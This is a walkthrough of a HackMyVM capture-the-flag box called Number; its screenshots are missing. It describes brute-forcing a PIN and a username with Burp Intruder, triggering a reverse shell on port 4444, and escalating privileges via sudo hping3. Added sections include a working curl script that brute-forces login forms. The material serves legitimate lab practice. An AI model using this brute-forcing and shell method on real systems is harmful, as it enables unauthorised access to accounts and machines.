HackMyVM Number Walkthrough

    Another cyber range appeared recently.  It's similar to Vulnhub in that people upload VMs, you download them, and you go hunting for flags.  There's a points system like TryHackMe and HackTheBox, which is a great way to gamify the environment.  I was curious to play, so I downloaded Number.

    The box has no description other than stating that it's a Medium level system.

    We kick off with Nmap:



    We find a web port.  Enumerating with Nikto:


    Then with GoBuster:



    We find a login:



    But after a few seconds of looking around, I feel like there's something missing.  We check out /pin:



    We capture a request in Burp and we send it to Intruder:



    Using Sniper, we'll attempt to brute-force the pin:



    Using seq -w 0000 4444, I create a zero-padded list of candidate pins (0000 through 4444) for our brute force:



    Adding the error message as the match condition so failed attempts are flagged:


     
    After a few seconds (Burp Pro, so Intruder isn't throttled), we learn the pin is 4444:



    We go back to the pin page and enter our pin:



    That doesn't help us:



    We move back to Sniper thinking that 4444 is our password:



    I'm just using a subset of RockYou as my wordlist; I think it's around 100k lines:



    Entering the error message:



    After a bit, we uncover the username:  melon
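    The two Sniper runs above (the pin against /pin, then the username against the login with 4444 as the password) are the same loop with different candidate lists.  The script below is an added example, not code from the original write-up, that drives that loop with curl so it works without Burp Pro's request rate.  The target address, the paths, the form field names and the failure strings are assumptions; take the real ones from the request captured in Burp.

```shell
#!/bin/sh
# Added example, not code from the original write-up: the two Intruder Sniper
# runs (PIN against /pin, then username against the login with the PIN as the
# password) done as a shell loop over curl. TARGET, the paths, the form field
# names and the failure strings are assumptions; take the real ones from the
# captured request.

TARGET="${TARGET:-http://192.168.56.101}"   # assumed address of the box

# Exactly the candidate list the post builds with seq: zero-padded 0000..4444.
pin_candidates() { seq -w 0000 4444; }
count_pin_candidates() { pin_candidates | wc -l | tr -d ' '; }

# try_post PATH FAILSTRING field=value ...
# Posts the fields (URL-encoded, so wordlist entries containing & or spaces
# survive) and succeeds only when the failure string is absent from the
# response, which is what the Intruder grep-match on the error message told us.
try_post() {
  path=$1; fail=$2; shift 2
  # turn each field=value into a --data-urlencode argument pair
  for kv; do set -- "$@" --data-urlencode "$kv"; shift; done
  body=$(curl -s -m 5 "$@" "$TARGET$path") || return 1
  case $body in
    *"$fail"*) return 1 ;;
    *) return 0 ;;
  esac
}

# brute_field ORACLE: reads candidates from stdin, prints the first one the
# oracle function accepts (exit status 0) and stops; exits 1 if none matches.
brute_field() {
  while read -r cand; do
    if "$1" "$cand"; then
      echo "$cand"
      return 0
    fi
  done
  return 1
}

# Oracles for the two stages. Paths, field names and error strings are assumed.
pin_oracle()  { try_post /pin   "Incorrect PIN" "pin=$1"; }
user_oracle() { try_post /login "Invalid login" "username=$1" "password=4444"; }

# Usage against the box (needs the network, so left as comments here):
#   pin_candidates | brute_field pin_oracle                # 4444 on this box
#   head -n 100000 rockyou.txt | brute_field user_oracle   # melon
```

    Because brute_field takes any function as its oracle, the same loop can be checked offline against a fake oracle before pointing it at the box, and swapped for a header or cookie check if the application signals failure with a status code rather than a string.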



    Back to the login:



    We are then presented with yet another form:



    We enter an IP address but it only accepts numbers:



    Just a quick sanity check:



    It accepts digits only, not dots.  We can convert the dotted-quad IP to a single decimal integer:
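    The conversion is just A*2^24 + B*2^16 + C*2^8 + D.  The functions below are an added example, not part of the original write-up, that do the conversion in both directions with input validation; 192.168.1.10 is a constructed placeholder for the attacking machine, not an address from the post.

```shell
#!/bin/sh
# Added example, not from the original write-up: dotted-quad IPv4 to the single
# decimal integer the form accepts, and the reverse so a captured value can be
# read back. 192.168.1.10 is a constructed placeholder for the attacker's IP.

# ip_to_decimal A.B.C.D -> A*2^24 + B*2^16 + C*2^8 + D
# Rejects anything that is not four octets of 0..255. Leading zeros are
# rejected too, because $(( )) would read 010 as octal in some shells.
ip_to_decimal() {
  saved_ifs=$IFS
  IFS=.
  set -- $1
  IFS=$saved_ifs
  [ $# -eq 4 ] || return 1
  for octet; do
    case $octet in
      0|[1-9]|[1-9][0-9]|[1-9][0-9][0-9]) [ "$octet" -le 255 ] || return 1 ;;
      *) return 1 ;;
    esac
  done
  echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

# decimal_to_ip N -> A.B.C.D for 0 <= N <= 2^32-1
decimal_to_ip() {
  n=$1
  case $n in
    0|[1-9]*) ;;
    *) return 1 ;;
  esac
  case $n in *[!0-9]*) return 1 ;; esac
  [ "$n" -le 4294967295 ] || return 1
  echo "$(( (n >> 24) & 255 )).$(( (n >> 16) & 255 )).$(( (n >> 8) & 255 )).$(( n & 255 ))"
}

# Sanity check, the same one the post does by hand:
ip_to_decimal 192.168.1.10    # 3232235786
decimal_to_ip 3232235786      # 192.168.1.10
```

    Linux resolvers accept the integer form directly (inet_aton treats a bare number as a 32-bit address), so `ping -c 1 $(ip_to_decimal 192.168.1.10)` is a quick way to confirm the value reaches your box before pasting it into the form.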



    I enter the decimal equivalent of my attacking machine:



    Since it's going to spawn a reverse shell, I set up tcpdump because I need to know which port it calls back on:



    When we hit submit, we see an inbound connection on the familiar port 4444.  We set up a handler:



    After we submit again, we catch a shell.  Once we clean it up, we move into melon's home directory and find:



    When we cat flag.sh, we find:



    This won't work for us since we're not the user melon.  Since we're unable to SSH in, I assume the password has to be something simple.



    You can read the flag at this point without the use of the script.  Checking sudo privileges:



    We elevate using hping3 and we have only one thing left to do:




    © 2021 Seven Layer Networks, Inc. | All rights reserved.